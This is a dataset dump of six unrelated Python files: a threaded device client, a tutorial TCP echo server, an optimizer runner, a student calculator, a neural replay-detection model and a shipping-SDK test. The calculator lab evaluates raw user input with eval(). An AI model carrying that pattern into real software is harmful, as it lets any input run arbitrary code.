+{"seq_id":"132196137","text":"import socket\nimport threading\nimport time\nimport queue\n\nimport communications.cyphersasclient\nimport parsers.clientforger\nimport config\nimport parsers.protocolutil as util\n\nfrom climanifests import cypherdealer as cypherdealer\nfrom climanifests import basic_requirements as basic_mani\nfrom climanifests import chain_process as chain_pro\nfrom climanifests import chain_processor\n\nfrom server_serv import forkliftsockserv as server\nfrom config import actionpool as thread_pool\n\n\nhost = config.serv_conn_host\nport = int(config.serv_conn_port)\n\nport_self = int(config.server_port)\n\nRESP_BUF = 4096\n\n##############################################################################################################\n# this is the only one queue for the device to send any stuff #\n# say in the future when multiple threading works are needed, just start other stuff with new socket threads.#\n##############################################################################################################\nsend_queue = queue.Queue()\n\n# create an ipv4 (AF_INET) socket object using the tcp protocol (SOCK_STREAM)\ncli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n try:\n cli.connect((host, port))\n break\n except socket.error:\n print('could not connect to server... will continue trying...')\n time.sleep(10)\n pass\n\ncypherClient = communications.cyphersasclient\n\n\nclass Banner:\n\n def __init__(self):\n self.name = config.device_name\n\n def say_stuff(self, stuff):\n self.name = stuff\n\n def see_stuff(self):\n print(self.name)\n\n\nclass Welcome:\n\n def __init__(self, my_name):\n self.name = my_name\n forger = Banner()\n forger.say_stuff('Hello world! This is a truckLift fork. '\n 'Will spread data and fork you guys. 
And my name is:'\n + self.name)\n forger.see_stuff()\n\n\ndef send_monitor():\n while True:\n next_mess = send_queue.get()\n if next_mess is not None and str(next_mess).strip() != '':\n print('sending::' + str(next_mess))\n try:\n cli.send(bytes(next_mess, 'UTF-8'))\n except Exception as ex:\n print('CUT_OFF={}'.format(ex.__str__()))\n return\n time.sleep(5 / 1000)\n\n\ndef recv_monitor():\n while 1:\n try:\n reply = cli.recv(RESP_BUF)\n if reply is not None and str(reply).strip() != '':\n re = str(reply, 'UTF-8')\n if re.__contains__('you have reached me'):\n print('regular kismet for ' + re)\n else:\n tube = parsers.clientforger.MessageTube(cli, re)\n tube.mess_deal()\n except ConnectionResetError:\n time.sleep(10)\n try:\n cli.connect((host, port))\n except socket.error:\n pass\n\n\ndef main_send():\n loginttl = int(config.loginttl) # the initial login ttl\n while True:\n islogged = util.get_logged(config.publicid)\n if islogged is None:\n islogged = 0\n util.save_logged(config.publicid)\n if islogged == 0:\n send_queue.put(cypherClient.truck_device_auth()) # login\n while util.get_logged(config.publicid) == 0 and loginttl > 0:\n loginttl = loginttl - 1\n time.sleep(1)\n break\n else:\n print('...LOGIN SUCCESSFUL...')\n break\n time.sleep(30)\n util.turn_logged(config.publicid)\n q = cypherClient.cypher_queue\n while True:\n next_mess = q.get()\n if next_mess is not None and str(next_mess).strip() != '':\n send_queue.put(next_mess)\n time.sleep(1 / 500)\n\n\n# action model manifest\ndef manifest_initiator():\n print('initiate manifests')\n basic_requirement_manifest = basic_mani.ManifestSyncBasicInfo(send_queue)\n basic_requirement_manifest.daemon = True\n basic_requirement_manifest.start()\n\n\nif __name__ == '__main__':\n welcome = Welcome(config.device_name)\n receive_main = threading.Thread(name='MainReceiveClient', target=recv_monitor)\n receive_main.daemon = True\n receive_main.start()\n send_main = threading.Thread(name='MainSendClient', target=send_monitor)\n send_main.daemon = True\n send_main.start()\n test_send = threading.Thread(name='MainSend', target=main_send)\n test_send.daemon = True\n test_send.start()\n manifest_thread = threading.Thread(name='manifest_initiator', target=manifest_initiator)\n manifest_thread.setDaemon(True)\n manifest_thread.start()\n chain_thread = chain_pro.ChainProcessThread()\n chain_thread.setDaemon(True)\n chain_thread.start()\n chain_sync_thread = chain_processor.SyncChain()\n chain_sync_thread.setDaemon(True)\n chain_sync_thread.start()\n cypher_dealer = cypherdealer.CypherDealer()\n cypher_dealer.setDaemon(True)\n cypher_dealer.start()\n chain_dealer = cypherdealer.SpecialForChain()\n chain_dealer.setDaemon(True)\n chain_dealer.start()\n midway_tube = thread_pool.MidwayTube(send_queue)\n midway_tube.daemon = True\n midway_tube.start()\n key_chain_gen = util.DailyKeyChainGen()\n key_chain_gen.daemon = True\n key_chain_gen.start()\n chain_calc_thread = cypherdealer.ChainCalculate()\n chain_calc_thread.daemon = True\n chain_calc_thread.start()\n thread_pool.on_pool(server.run_serv, port_self)\n","sub_path":"__main__/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
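The client above funnels all outbound traffic through `send_queue` so that a single thread owns every socket write. A self-contained sketch of that single-writer pattern, with a list standing in for the socket and `None` used as a hypothetical shutdown sentinel:

```python
import queue
import threading

send_queue = queue.Queue()
sent = []


def send_monitor():
    while True:
        message = send_queue.get()
        if message is None:   # sentinel tells the writer thread to exit
            return
        sent.append(message)  # a real client would call sock.send() here


worker = threading.Thread(target=send_monitor, daemon=True)
worker.start()
send_queue.put("hello")
send_queue.put(None)
worker.join()
assert sent == ["hello"]
```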
+{"seq_id":"296834754","text":"import socket\n\n# 创建一个socket\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n# 绑定ip端口\nserver.bind(('127.0.0.1',8888))\n\n# 监听\nserver.listen(5)\n\nprint(\"服务器启动...\")\n\"\"\"\nwhile True:\n # 等待连接\n clientSocket,clientAddr = server.accept()\n # 启动一个线程,将当前连接的socket借给线程\n\"\"\"\n\n# 等待连接\nclientSocket,clientAddr = server.accept()\ntry:\n while True:\n # 接收客户端的数据\n data = clientSocket.recv(1024).decode(\"utf-8\")\n print(\"接收到来自%s的数据:%s\" % (clientAddr,data))\n clientSocket.send((\"接收到来自%s的数据:%s\" % (clientAddr,data)).encode(\"utf-8\"))\nexcept ConnectionResetError:\n print(\"断开连接,客户端关闭连接\")\n","sub_path":"《Python从入门到精通 明日科技》python自学笔记/26,网络编程/TCP编程/2,客户端与服务器交互/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"371470132","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# Created on 05/06/20 3:55 PM\r\n# @author: Gurusankar G\r\n\r\nimport collections\r\nimport datetime\r\nimport itertools\r\nimport logging\r\nimport time\r\n\r\nimport xmltodict\r\nfrom tqdm import tqdm\r\n\r\n# Necessary imports includes importing Triple optimizer package\r\nimport ta_lib.tpo.optimization.discrete.results_helper as res\r\nfrom ta_lib.core.api import create_context, initialize_environment\r\nfrom ta_lib.core.utils import configure_logger, get_package_path\r\nfrom ta_lib.tpo.optimization.discrete.global_data_init_class import ( # noqa\r\n global_initializer,\r\n)\r\nfrom ta_lib.tpo.optimization.discrete.stage_3_tpo_optimizer import Stage3_caller\r\n\r\n\r\ndef get_pack_path():\r\n \"\"\"Absolute path for the package.\"\"\"\r\n return get_package_path().replace(\"\\\\\", \"/\") + \"/\"\r\n\r\n\r\ndef current_time():\r\n return datetime.datetime.now().strftime(\"%d_%m_%Y_%H_%M_%S\")\r\n\r\n\r\ninitialize_environment(debug=False, hide_warnings=True)\r\nconfig_path = (\r\n get_pack_path() + \"../notebooks/tpo/python/conf/config.yml\"\r\n) # noqa\r\n\r\ncontext = create_context(config_path)\r\n\r\nlogger = logging.getLogger(__name__)\r\nlog_path = get_pack_path() + \"../logs/tpo_optimizer_\" + current_time() + \".log\"\r\nlogger = configure_logger(log_file=log_path, log_level=\"DEBUG\")\r\n\r\n# Inputs for Particular Retailer Category Combination is stored int input.xml\r\n\r\n# Reading and making the relevant information for\r\n# each retailer and category stored in input.xml\r\noptim_config_path = (\r\n get_pack_path()\r\n + \"../notebooks/tpo/python/conf/Discrete_optimizer_config.xml\"\r\n)\r\n\r\nwith open(optim_config_path) as fd: # noqa\r\n doc = xmltodict.parse(fd.read())\r\nhead = doc[\"data\"]\r\nRetailer_Category_Combo = head[\"ret_cat_combo\"]\r\n\r\nif isinstance(Retailer_Category_Combo, collections.OrderedDict):\r\n Retailer_Category_Combo = [Retailer_Category_Combo]\r\n\r\nif __name__ == \"__main__\":\r\n\r\n for single_combo in tqdm(Retailer_Category_Combo):\r\n global Globals\r\n # calling the global initializer for creating a concrete class\r\n # for global data availability across optimizer stages\r\n Globals = global_initializer(single_combo)\r\n check = globals\r\n counter = 0 # track how many combinations converge\r\n combo = [False, True]\r\n z = 0\r\n const_comb = list(itertools.product(combo, repeat=13))[1:]\r\n\r\n for single_comb in const_comb:\r\n\r\n single_comb = [\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n True,\r\n False,\r\n True,\r\n True,\r\n True,\r\n False,\r\n False,\r\n False,\r\n ]\r\n sec_sing_comb = [\r\n single_comb[0],\r\n single_comb[6],\r\n single_comb[11],\r\n single_comb[12],\r\n ]\r\n\r\n if Globals.class_loader():\r\n\r\n s = time.time()\r\n Stage3_caller(Globals, single_comb, sec_sing_comb)\r\n e = time.time()\r\n if (\r\n Globals.Stage3Success\r\n & Globals.Stage2Success\r\n & Globals.Stage1Success\r\n ):\r\n St1 = Globals.Stage1Success\r\n St2 = Globals.Stage2Success\r\n St3 = Globals.Stage3Success\r\n\r\n if St1 & St2 & St3:\r\n\r\n res.save_results(Globals, runtime=e - s)\r\n break\r\n","sub_path":"caller.py","file_name":"caller.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"512414475","text":"\"\"\" CSC 161 Lab2 Xiaoxuan Wang\r\n This program implements a basic interactive calculator.\r\n\r\nSept 11, 2016\r\n\"\"\"\r\n\r\n\r\ndef main():\r\n n = eval(input(\"How many calculations should I perform?\"))\r\n\r\n for i in range(n):\r\n exp = input(\"Enter a math expression:\")\r\n result = eval(exp)\r\n print(exp, \" = \", result)\r\n\r\n\r\nmain()\r\n","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"586909261","text":"from functools import partial\nfrom itertools import combinations_with_replacement\nfrom logging import getLogger\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xarray as xr\nfrom sklearn.base import BaseEstimator\nfrom sklearn.externals import joblib\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom sklearn.neighbors import KernelDensity\nfrom statsmodels.tsa.tsatools import lagmat\n\nfrom .core import (_filter, _smoother, atleast_2d, get_grid,\n get_observed_position_bin, replace_NaN, return_None)\nfrom .lfp_likelihood import fit_lfp_likelihood\nfrom .movement_state_transition import (empirical_movement, random_walk,\n w_track_1D_random_walk)\nfrom .multiunit_likelihood import fit_multiunit_likelihood\nfrom .replay_state_transition import fit_replay_state_transition\nfrom .speed_likelhood import fit_speed_likelihood\nfrom .spiking_likelihood import fit_spiking_likelihood\n\nlogger = getLogger(__name__)\n\n_DEFAULT_LIKELIHOODS = ['spikes', 'lfp_power']\n_DEFAULT_MULTIUNIT_KWARGS = dict(n_components=30, max_iter=200, tol=1E-6)\n_DEFAULT_LFP_KWARGS = dict(n_components=10, max_iter=200, tol=1E-6)\n_DEFAULT_OCCUPANCY_KWARGS = dict(bandwidth=2)\n\n\nclass ReplayDetector(BaseEstimator):\n \"\"\"Find replay events using information from spikes, lfp ripple band power,\n speed, and/or multiunit.\n\n Attributes\n ----------\n speed_threshold : float, optional\n Speed cutoff that denotes when the animal is moving vs. not moving.\n spike_model_penalty : float, optional\n replay_state_transition_penalty : float, optional\n place_bin_size : float, optional\n replay_speed : int, optional\n The amount of speedup expected from the replay events vs.\n normal movement.\n spike_model_knot_spacing : float, optional\n Determines how far apart to place to the spline knots over position.\n speed_knots : ndarray, shape (n_knots,), optional\n Spline knots for lagged speed in replay state transition.\n multiunit_density_model : Class, optional\n Fits the mark space vs. position density. Can be any class with a fit,\n score_samples, and a sample method. 
For example, density estimators\n from scikit-learn such as sklearn.neighbors.KernelDensity,\n sklearn.mixture.GaussianMixture, and\n sklearn.mixture.BayesianGaussianMixture.\n multiunit_model_kwargs : dict, optional\n Arguments for the `multiunit_density_model`\n\n Methods\n -------\n fit\n Fits the model to the training data.\n predict\n Predicts the replay probability and posterior density to new data.\n plot_fitted_place_fields\n Plot the place fields from the fitted spiking data.\n plot_fitted_multiunit_model\n Plot position by mark from the fitted multiunit data.\n plot_replay_state_transition\n Plot the replay state transition model over speed lags.\n plot_movement_state_transition\n Plot the semi-latent state movement transition model.\n\n \"\"\"\n\n def __init__(self, speed_threshold=4.0, spike_model_penalty=1E-1,\n replay_state_transition_penalty=1E-5,\n place_bin_size=2.0, n_place_bins=None, replay_speed=20,\n movement_std=0.050, spike_model_knot_spacing=15,\n speed_knots=None,\n multiunit_density_model=BayesianGaussianMixture,\n multiunit_model_kwargs=_DEFAULT_MULTIUNIT_KWARGS,\n multiunit_occupancy_model=KernelDensity,\n multiunit_occupancy_kwargs=_DEFAULT_OCCUPANCY_KWARGS,\n lfp_model=BayesianGaussianMixture,\n lfp_model_kwargs=_DEFAULT_LFP_KWARGS,\n movement_state_transition_type='empirical'):\n if n_place_bins is not None and place_bin_size is not None:\n logger.warn('Both place_bin_size and n_place_bins are set. Using'\n ' place_bin_size.')\n self.speed_threshold = speed_threshold\n self.spike_model_penalty = spike_model_penalty\n self.replay_state_transition_penalty = replay_state_transition_penalty\n self.place_bin_size = place_bin_size\n self.n_place_bins = n_place_bins\n self.replay_speed = replay_speed\n self.movement_std = movement_std\n self.spike_model_knot_spacing = spike_model_knot_spacing\n self.speed_knots = speed_knots\n self.multiunit_density_model = multiunit_density_model\n self.multiunit_model_kwargs = multiunit_model_kwargs\n self.multiunit_occupancy_model = multiunit_occupancy_model\n self.multiunit_occupancy_kwargs = multiunit_occupancy_kwargs\n self.lfp_model = lfp_model\n self.lfp_model_kwargs = lfp_model_kwargs\n self.movement_state_transition_type = movement_state_transition_type\n\n def fit(self, is_replay, speed, position, lfp_power=None,\n spikes=None, multiunit=None, is_track_interior=None,\n track_labels=None):\n \"\"\"Train the model on replay and non-replay periods.\n\n Parameters\n ----------\n is_replay : bool ndarray, shape (n_time,)\n speed : ndarray, shape (n_time,)\n position : ndarray, shape (n_time,)\n lfp_power : ndarray or None, shape (n_time, n_signals), optional\n spikes : ndarray or None, shape (n_time, n_neurons), optional\n multiunit : ndarray or None, shape (n_time, n_marks, n_signals), optional\n np.nan represents times with no multiunit activity.\n is_track_interior : ndarray, shape (n_place_bins, n_position_dims)\n track_labels : ndarray or None, shape (n_time,)\n \"\"\"\n speed = np.asarray(speed).squeeze()\n position = atleast_2d(np.asarray(position))\n is_replay = np.asarray(is_replay).squeeze()\n\n (self.edges_, self.place_bin_edges_, self.place_bin_centers_,\n self.centers_shape_) = get_grid(\n position, bin_size=self.place_bin_size)\n\n if is_track_interior is None:\n self.is_track_interior_ = np.ones_like(self.place_bin_centers_,\n dtype=np.bool)\n\n logger.info('Fitting speed model...')\n self._speed_likelihood = fit_speed_likelihood(\n speed, is_replay, self.speed_threshold)\n if lfp_power is not None:\n 
logger.info('Fitting LFP power model...')\n lfp_power = np.asarray(lfp_power)\n self._lfp_likelihood = fit_lfp_likelihood(\n lfp_power, is_replay, self.lfp_model, self.lfp_model_kwargs)\n else:\n self._lfp_likelihood = return_None\n\n if spikes is not None:\n logger.info('Fitting spiking model...')\n spikes = np.asarray(spikes)\n self._spiking_likelihood = fit_spiking_likelihood(\n position, spikes, is_replay, self.place_bin_centers_,\n self.spike_model_penalty, self.spike_model_knot_spacing)\n else:\n self._spiking_likelihood = return_None\n\n if multiunit is not None:\n logger.info('Fitting multiunit model...')\n multiunit = np.asarray(multiunit)\n self._multiunit_likelihood = fit_multiunit_likelihood(\n position, multiunit, is_replay, self.place_bin_centers_,\n self.multiunit_density_model, self.multiunit_model_kwargs,\n self.multiunit_occupancy_model, self.multiunit_occupancy_kwargs\n )\n else:\n self._multiunit_likelihood = return_None\n\n logger.info('Fitting movement state transition...')\n if self.movement_state_transition_type == 'empirical':\n self.movement_state_transition_ = empirical_movement(\n position, self.edges_, is_training=speed > 4,\n replay_speed=self.replay_speed)\n elif self.movement_state_transition_type == 'random_walk':\n self.movement_state_transition_ = random_walk(\n self.place_bin_centers_, self.movement_std**2,\n is_track_interior=self.is_track_interior_,\n replay_speed=self.replay_speed)\n elif self.movement_state_transition_type == 'w_track_1D_random_walk':\n self.movement_state_transition_ = w_track_1D_random_walk(\n position, self.place_bin_edges_,\n self.place_bin_centers_, track_labels,\n self.movement_std**2, self.replay_speed)\n logger.info('Fitting replay state transition...')\n self.replay_state_transition_ = fit_replay_state_transition(\n speed, is_replay, self.replay_state_transition_penalty,\n self.speed_knots)\n\n return self\n\n def predict(self, speed, position, lfp_power=None, spikes=None,\n multiunit=None, use_likelihoods=_DEFAULT_LIKELIHOODS,\n time=None, use_smoother=True):\n \"\"\"Predict the probability of replay and replay position/position.\n\n Parameters\n ----------\n speed : ndarray, shape (n_time,)\n position : ndarray, shape (n_time,)\n lfp_power : ndarray, shape (n_time, n_signals)\n spikes : ndarray or None, shape (n_time, n_neurons), optional\n multiunit : ndarray or None, shape (n_time, n_marks, n_signals),\n optional\n use_likelihoods : list of str, optional\n Valid strings in the list are:\n (speed | lfp_power | spikes | multiunit)\n time : ndarray or None, shape (n_time,), optional\n Experiment time will be included in the results if specified.\n use_smoother : bool, True\n\n Returns\n -------\n decoding_results : xarray.Dataset\n Includes replay probability and posterior density.\n\n \"\"\"\n n_time = speed.shape[0]\n speed = np.asarray(speed).squeeze()\n position = atleast_2d(np.asarray(position))\n if lfp_power is not None:\n lfp_power = np.asarray(lfp_power)\n if spikes is not None:\n spikes = np.asarray(spikes)\n if multiunit is not None:\n multiunit = np.asarray(multiunit)\n\n if time is None:\n time = np.arange(n_time)\n lagged_speed = lagmat(speed, maxlag=1).squeeze()\n\n place_bins = self.place_bin_centers_\n\n likelihood = np.ones((n_time, 2, 1))\n\n likelihoods = {\n 'speed': partial(self._speed_likelihood, speed=speed,\n lagged_speed=lagged_speed),\n 'lfp_power': partial(self._lfp_likelihood,\n ripple_band_power=lfp_power),\n 'spikes': partial(self._spiking_likelihood,\n is_spike=spikes, position=position),\n 
'multiunit': partial(self._multiunit_likelihood,\n multiunit=multiunit, position=position)\n }\n\n for name, likelihood_func in likelihoods.items():\n if name.lower() in use_likelihoods:\n logger.info('Predicting {0} likelihood...'.format(name))\n likelihood = likelihood * replace_NaN(likelihood_func())\n if (name == 'spikes') or (name == 'multiunit'):\n likelihood[:, :, ~self.is_track_interior_.squeeze()] = 0.0\n replay_state_transition = self.replay_state_transition_(lagged_speed)\n observed_position_bin = get_observed_position_bin(\n position, self.place_bin_edges_)\n\n logger.info('Predicting replay probability and density...')\n posterior, state_probability, _ = _filter(\n likelihood, self.movement_state_transition_,\n replay_state_transition, observed_position_bin)\n if use_smoother:\n logger.info('Smoothing...')\n posterior, state_probability, _, _ = _smoother(\n posterior, self.movement_state_transition_,\n replay_state_transition, observed_position_bin)\n if likelihood.shape[-1] > 1:\n likelihood_dims = ['time', 'state', 'position']\n else:\n likelihood_dims = ['time', 'state']\n coords = {'time': time,\n 'position': place_bins.squeeze(),\n 'state': ['No Replay', 'Replay']}\n\n return xr.Dataset(\n {'replay_probability': (['time'], state_probability[:, 1]),\n 'posterior': (['time', 'state', 'position'], posterior),\n 'likelihood': (likelihood_dims, likelihood.squeeze())},\n coords=coords)\n\n def plot_fitted_place_fields(self, sampling_frequency=1, col_wrap=5,\n axes=None):\n \"\"\"Plot the place fields from the fitted spiking data.\n\n Parameters\n ----------\n ax : matplotlib axes or None, optional\n sampling_frequency : float, optional\n\n \"\"\"\n place_conditional_intensity = (\n self._spiking_likelihood\n .keywords['place_conditional_intensity']).squeeze()\n n_neurons = place_conditional_intensity.shape[1]\n n_rows = np.ceil(n_neurons / col_wrap).astype(np.int)\n\n if axes is None:\n fig, axes = plt.subplots(n_rows, col_wrap, sharex=True,\n figsize=(col_wrap * 2, n_rows * 2))\n\n for ind, ax in enumerate(axes.flat):\n if ind < n_neurons:\n ax.plot(self.place_bin_centers_,\n place_conditional_intensity[:, ind] *\n sampling_frequency, color='red', linewidth=3,\n label='fitted model')\n ax.set_title(f'Neuron #{ind + 1}')\n ax.set_ylabel('Spikes / s')\n ax.set_xlabel('Position')\n else:\n ax.axis('off')\n plt.tight_layout()\n\n @staticmethod\n def plot_spikes(spikes, position, is_replay, sampling_frequency=1,\n col_wrap=5, bins='auto'):\n is_replay = np.asarray(is_replay.copy()).squeeze()\n position = np.asarray(position.copy()).squeeze()[~is_replay]\n spikes = np.asarray(spikes.copy())[~is_replay]\n\n position_occupancy, bin_edges = np.histogram(position, bins=bins)\n bin_size = np.diff(bin_edges)[0]\n\n time_ind, neuron_ind = np.nonzero(spikes)\n n_neurons = spikes.shape[1]\n\n n_rows = np.ceil(n_neurons / col_wrap).astype(np.int)\n\n fig, axes = plt.subplots(n_rows, col_wrap, sharex=True,\n figsize=(col_wrap * 2, n_rows * 2))\n\n for ind, ax in enumerate(axes.flat):\n if ind < n_neurons:\n hist, _ = np.histogram(position[time_ind[neuron_ind == ind]],\n bins=bin_edges)\n rate = sampling_frequency * hist / position_occupancy\n ax.bar(bin_edges[:-1], rate, width=bin_size)\n ax.set_title(f'Neuron #{ind + 1}')\n ax.set_ylabel('Spikes / s')\n ax.set_xlabel('Position')\n else:\n ax.axis('off')\n\n plt.tight_layout()\n\n return axes\n\n def plot_fitted_multiunit_model(self, sampling_frequency=1,\n n_samples=10000,\n mark_edges=np.linspace(0, 400, 100),\n is_histogram=False):\n 
\"\"\"Plot position by mark from the fitted multiunit data.\n\n Parameters\n ----------\n sampling_frequency : float, optional\n If 'is_histogram' is True, then used for computing the intensity.\n n_samples : int, optional\n Number of samples to generate from the fitted model.\n mark_edges : ndarray, shape (n_edges,)\n If `is_histogram` is True, then the edges that define the mark bins\n is_histogram : bool, optional\n If True, plots the joint mark intensity of the samples. Otherwise,\n a scatter plot of the samples is returned.\n\n Returns\n -------\n axes : matplotlib.pyplot axes\n\n \"\"\"\n joint_models = (self._multiunit_likelihood\n .keywords['joint_models'])\n mean_rates = self._multiunit_likelihood.keywords['mean_rates']\n bins = (self.place_bin_edges_.squeeze(), mark_edges)\n if is_histogram:\n place_occupancy = np.exp(\n self._multiunit_likelihood\n .keywords['occupancy_model']\n .score_samples(self.place_bin_centers_))\n n_signals = len(joint_models)\n try:\n n_marks = joint_models[0].sample().shape[1] - 1\n except AttributeError:\n n_marks = joint_models[0].sample()[0].shape[1] - 1\n\n fig, axes = plt.subplots(n_signals, n_marks,\n figsize=(n_marks * 3, n_signals * 3),\n sharex=True, sharey=True)\n zipped = zip(joint_models, mean_rates, axes)\n for electrode_ind, (model, mean_rate, row_axes) in enumerate(zipped):\n try:\n samples, _ = model.sample(n_samples)\n except ValueError:\n samples = model.sample(n_samples)\n\n for mark_ind, ax in enumerate(row_axes):\n if is_histogram:\n H = np.histogram2d(samples[:, -1], samples[:, mark_ind],\n bins=bins, normed=True)[0]\n H = sampling_frequency * mean_rate * H.T / place_occupancy\n X, Y = np.meshgrid(*bins)\n ax.pcolormesh(X, Y, H, vmin=0)\n else:\n ax.scatter(samples[:, -1], samples[:, mark_ind], alpha=0.1)\n ax.set_title(\n f'Electrode {electrode_ind + 1}, Feature {mark_ind + 1}')\n\n plt.xlim((bins[0].min(), bins[0].max()))\n plt.ylim((bins[1].min(), bins[1].max()))\n plt.tight_layout()\n\n return axes\n\n def plot_replay_state_transition(self):\n \"\"\"Plot the replay state transition model over speed lags.\"\"\"\n lagged_speeds = np.arange(0, 30, .1)\n probablity_replay = self.replay_state_transition_(lagged_speeds)\n\n fig, axes = plt.subplots(2, 1, figsize=(5, 5), sharex=True)\n axes[0].plot(lagged_speeds, probablity_replay[:, 1])\n axes[0].set_ylabel('Probability Replay')\n axes[0].set_title('Previous time step is replay')\n\n axes[1].plot(lagged_speeds, probablity_replay[:, 0])\n axes[1].set_xlabel('Speed t - 1')\n axes[1].set_ylabel('Probability Replay')\n axes[1].set_title('Previous time step is not replay')\n\n plt.tight_layout()\n\n def plot_movement_state_transition(self, ax=None):\n \"\"\"Plot the sped up empirical movement state transition.\n\n Parameters\n ----------\n ax : matplotlib axis or None, optional\n\n \"\"\"\n if ax is None:\n ax = plt.gca()\n place_t, place_t_1 = np.meshgrid(self.place_bin_edges_,\n self.place_bin_edges_)\n vmax = np.percentile(self.movement_state_transition_, 97.5)\n cax = ax.pcolormesh(place_t, place_t_1,\n self.movement_state_transition_, vmin=0, vmax=vmax)\n ax.set_xlabel('position t')\n ax.set_ylabel('position t - 1')\n ax.set_title('Movement State Transition')\n plt.colorbar(cax, label='probability')\n\n @staticmethod\n def plot_multiunit(multiunit, position, is_replay, axes=None):\n '''Plot the multiunit training data for comparison with the\n fitted model.'''\n multiunit = np.asarray(multiunit.copy())\n position = atleast_2d(np.asarray(position.copy()))\n is_replay = 
np.asarray(is_replay.copy()).squeeze()\n\n if axes is None:\n _, n_marks, n_signals = multiunit.shape\n _, axes = plt.subplots(n_signals, n_marks,\n figsize=(n_marks * 3, n_signals * 3),\n sharex=True, sharey=True)\n zipped = zip(axes, np.moveaxis(multiunit, 2, 0))\n for electrode_ind, (row_axes, m) in enumerate(zipped):\n not_nan = np.any(~np.isnan(m), axis=-1)\n for mark_ind, ax in enumerate(row_axes):\n ax.scatter(position[not_nan & ~is_replay],\n m[not_nan & ~is_replay, mark_ind],\n alpha=0.1, zorder=-1)\n ax.set_title(\n f'Electrode {electrode_ind + 1}, Feature {mark_ind + 1}')\n\n plt.xlim((np.nanmin(position), np.nanmax(position)))\n\n @staticmethod\n def plot_lfp_power(lfp_power, is_replay):\n '''Plot the lfp power training data for comparison with the\n fitted model.'''\n lfp_power = np.log(np.asarray(lfp_power.copy()))\n is_replay = np.asarray(is_replay.copy()).squeeze()\n n_lfps = lfp_power.shape[1]\n lfp_ind = np.arange(n_lfps)\n\n fig, axes = plt.subplots(n_lfps, n_lfps,\n figsize=(2 * n_lfps, 2 * n_lfps),\n sharex=True, sharey=True)\n combinations_ind = combinations_with_replacement(lfp_ind, 2)\n for (ind1, ind2) in combinations_ind:\n axes[ind1, ind2].scatter(lfp_power[~is_replay, ind1],\n lfp_power[~is_replay, ind2],\n label='No Replay', alpha=0.5)\n axes[ind1, ind2].scatter(lfp_power[is_replay, ind1],\n lfp_power[is_replay, ind2],\n label='Replay', alpha=0.5)\n axes[ind1, ind2].set_title(f'Electrode {ind1 + 1} vs. {ind2 + 1}')\n if ind1 != ind2:\n axes[ind2, ind1].axis('off')\n\n axes[0, 0].legend()\n plt.tight_layout()\n\n def plot_fitted_lfp_power_model(self, n_samples=1000):\n replay_model = self._lfp_likelihood.keywords['replay_model']\n no_replay_model = self._lfp_likelihood.keywords['no_replay_model']\n try:\n replay_samples, _ = replay_model.sample(n_samples=n_samples)\n no_replay_samples, _ = no_replay_model.sample(n_samples=n_samples)\n samples = np.concatenate((replay_samples, no_replay_samples),\n axis=0)\n except ValueError:\n samples = np.concatenate(\n (replay_model.sample(n_samples=n_samples),\n no_replay_model.sample(n_samples=n_samples)), axis=0)\n\n is_replay = np.zeros((n_samples * 2,), dtype=np.bool)\n is_replay[:n_samples] = True\n\n self.plot_lfp_power(np.exp(samples), is_replay)\n\n def save_model(self, filename='model.pkl'):\n raise NotImplementedError\n # Won't work until patsy designInfo becomes pickleable\n joblib.dump(self, filename)\n\n @staticmethod\n def load_model(filename='model.pkl'):\n raise NotImplementedError\n # Won't work until patsy designInfo becomes pickleable\n return joblib.load(filename)\n","sub_path":"replay_identification/decoders.py","file_name":"decoders.py","file_ext":"py","file_size_in_byte":22987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
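A sketch of the `ReplayDetector` fit/predict surface on synthetic arrays, following the shapes documented in the docstrings above. This is illustrative only: the import path is inferred from `sub_path`, and real use needs actual recordings rather than random data:

```python
import numpy as np

from replay_identification.decoders import ReplayDetector  # inferred path

n_time = 5000
rng = np.random.RandomState(0)
speed = rng.uniform(0, 30, size=n_time)          # shape (n_time,)
position = np.abs(np.cumsum(rng.randn(n_time)))  # shape (n_time,)
is_replay = speed < 4                            # stand-in labels
spikes = rng.binomial(1, 0.01, size=(n_time, 10))

detector = ReplayDetector()
detector.fit(is_replay, speed, position, spikes=spikes)
results = detector.predict(speed, position, spikes=spikes,
                           use_likelihoods=['spikes', 'speed'])
print(results.replay_probability)
```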
+{"seq_id":"374877208","text":"\"\"\"Test the Carrier class object.\"\"\"\nfrom shipengine_sdk.errors import ShipEngineError\nfrom shipengine_sdk.models import Carrier\n\n\nclass TestCarrier:\n def test_invalid_carrier(self) -> None:\n try:\n Carrier(code=\"royal_mail\")\n except ShipEngineError as err:\n assert err.message == \"Carrier [royal_mail] not currently supported.\"\n\n def test_to_json(self) -> None:\n carrier = Carrier(code=\"fedex\")\n assert type(carrier.to_json()) is str\n","sub_path":"tests/models/carriers/test_carrier.py","file_name":"test_carrier.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
